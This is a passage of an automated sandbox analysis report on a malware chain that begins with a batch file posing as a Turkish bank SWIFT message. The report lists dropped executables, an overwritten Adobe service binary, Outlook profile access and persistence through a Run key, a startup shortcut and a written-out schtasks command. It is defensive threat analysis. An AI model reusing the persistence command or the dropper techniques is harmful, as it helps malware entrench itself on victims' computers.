                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: url.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ieframe.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: iertutil.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: netapi32.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: userenv.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: winhttp.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: wkscli.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: netutils.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: amsi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: apllllphllelp.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: winmm.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: wininet.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: sspicli.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: windows.storage.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: wldp.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: profapi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: kernel.appcore.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ieproxy.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ieproxy.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ieproxy.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: mswsock.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: mssip32.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: iphlpapi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: mssip32.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: winnsi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: mssip32.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: smartscreenps.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: smartscreenps.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: smartscreenps.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ???.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ???.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ???.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ??l.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ??l.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ?.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ?.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ??l.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ????.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ???e???????????.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ???e???????????.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ?.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ?.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ?.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ?.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ??l.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ??l.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: tquery.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: cryptdll.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: spp.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: vssapi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: vsstrace.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: spp.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: vssapi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: vsstrace.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: mssip32.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: endpointdlp.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: endpointdlp.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: endpointdlp.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: endpointdlp.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: spp.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: vssapi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: vsstrace.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: sppwmi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: slc.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: sppcext.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: winscard.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: devobj.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: cryptsp.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: rsaenh.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: cryptbase.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: winhttp.dll
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: mpr.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                      Source: TrojanAIbot.exe.lnk.14.drLNK file: ..\..\..\..\..\ACCApi\TrojanAIbot.exe
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.batStatic file information: File size 1057171 > 1048576
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: x.exe, x.exe, 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1526389874.00000000206E3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1443292232.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1444132666.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1526389874.0000000020787000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000008.00000003.1493765037.00000000054E0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000009.00000003.1497786383.0000000004A20000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbH source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000003.1497081210.0000000021C10000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1497081210.0000000021C3F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1526389874.00000000206E3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1443906217.00000000027DB000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1443292232.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1444132666.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1510941907.00000000027DD000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1526389874.0000000020787000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdb source: esentutl.exe, 00000008.00000003.1493765037.00000000054E0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ping.pdb source: esentutl.exe, 00000009.00000003.1497786383.0000000004A20000.00000004.00001000.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: Yara matchFile source: 4.2.x.exe.2a00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000003.1444132666.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: lxsyrsiW.pif.4.drStatic PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A1894C LoadLibraryW,GetProcAddress,FreeLibrary,4_2_02A1894C
                      Source: armsvc.exe.12.drStatic PE information: real checksum: 0x32318 should be: 0x14596a
                      Source: neworigin.exe.12.drStatic PE information: real checksum: 0x0 should be: 0x480db
                      Source: x.exe.3.drStatic PE information: real checksum: 0x0 should be: 0x10eeb3
                      Source: server_BTC.exe.12.drStatic PE information: real checksum: 0x0 should be: 0x42478
                      Source: lxsyrsiW.pif.4.drStatic PE information: real checksum: 0x0 should be: 0x1768a
                      Source: Wisrysxl.PIF.10.drStatic PE information: real checksum: 0x0 should be: 0x10eeb3
                      Source: TrojanAIbot.exe.14.drStatic PE information: real checksum: 0x0 should be: 0x42478
                      Source: alpha.pif.8.drStatic PE information: section name: .didat
                      Source: armsvc.exe.12.drStatic PE information: section name: .didat
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A2D2FC push 02A2D367h; ret 4_2_02A2D35F
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A063AE push 02A0640Bh; ret 4_2_02A06403
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A063B0 push 02A0640Bh; ret 4_2_02A06403
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A0332C push eax; ret 4_2_02A03368
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A2C378 push 02A2C56Eh; ret 4_2_02A2C566
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A0C349 push 8B02A0C1h; ret 4_2_02A0C34E
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A2D0AC push 02A2D125h; ret 4_2_02A2D11D
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A1306B push 02A130B9h; ret 4_2_02A130B1
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A1306C push 02A130B9h; ret 4_2_02A130B1
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A2D1F8 push 02A2D288h; ret 4_2_02A2D280
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A1F108 push ecx; mov dword ptr [esp], edx4_2_02A1F10D
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A2D144 push 02A2D1ECh; ret 4_2_02A2D1E4
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A06782 push 02A067C6h; ret 4_2_02A067BE
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A06784 push 02A067C6h; ret 4_2_02A067BE
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A0D5A0 push 02A0D5CCh; ret 4_2_02A0D5C4
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A0C56C push ecx; mov dword ptr [esp], edx4_2_02A0C571
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A2C570 push 02A2C56Eh; ret 4_2_02A2C566
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A1AAE0 push 02A1AB18h; ret 4_2_02A1AB10
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A18AD8 push 02A18B10h; ret 4_2_02A18B08
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A1AADF push 02A1AB18h; ret 4_2_02A1AB10
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A0CA4E push 02A0CD72h; ret 4_2_02A0CD6A
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A0CBEC push 02A0CD72h; ret 4_2_02A0CD6A
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A1886C push 02A188AEh; ret 4_2_02A188A6
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A74850 push eax; ret 4_2_02A74920
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A1790C push 02A17989h; ret 4_2_02A17981
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A16946 push 02A169F3h; ret 4_2_02A169EB
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A16948 push 02A169F3h; ret 4_2_02A169EB
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A15E7C push ecx; mov dword ptr [esp], edx4_2_02A15E7E
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A12F60 push 02A12FD6h; ret 4_2_02A12FCE
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_016B0C6D push edi; retf 13_2_016B0C7A
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_04EB633D push eax; ret 15_2_04EB6351

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Wisrysxl.PIFJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\lxsyrsiW.pifJump to dropped file
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Wisrysxl.PIFJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile created: C:\Users\user\AppData\Local\Temp\server_BTC.exeJump to dropped file
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\lxsyrsiW.pifJump to dropped file
                      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile created: C:\Users\user\AppData\Local\Temp\neworigin.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeFile created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:07 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnkJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnkJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WisrysxlJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WisrysxlJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A1AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_02A1AB1C
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
